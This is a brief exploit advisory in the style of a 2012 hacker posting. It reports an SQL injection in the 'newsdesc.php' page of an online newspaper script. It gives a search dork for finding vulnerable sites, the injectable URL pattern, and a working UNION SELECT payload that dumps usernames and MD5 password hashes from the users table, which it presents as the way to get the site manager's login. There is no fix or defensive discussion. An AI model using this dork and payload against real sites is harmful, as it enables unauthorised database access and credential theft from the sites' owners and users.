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online newspaper university"newsdesc.php" SQL Injection Vulnerabilities

# Title : online newspaper university "newsdesc.php" SQL Injection 
# Discovered By: CrAzY CrAcKeR
# Home  : Null
# Email : CrAzY_CrAcKeR@xxxxxxxxxxxxxxx
# date  : 12/4/2012
# d0rk:- inurl:"inurl:news/newsdesc.php"
#            +-+-+-+-+-+-+-+-+-+-+
#         --+CrAzY CrAcKeR+--
#            +-+-+-+-+-+-+-+-+-+-+
# Example:-
#  [-] http://www.???.com/news/newsdesc.php?id=(sql)
# [-] Injection code.... ( 
0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20-- )
# [-] 
# [-]  you see  now password (md5) and the name of the site manager
# Greeting to my friend  "A7eb Alwrd"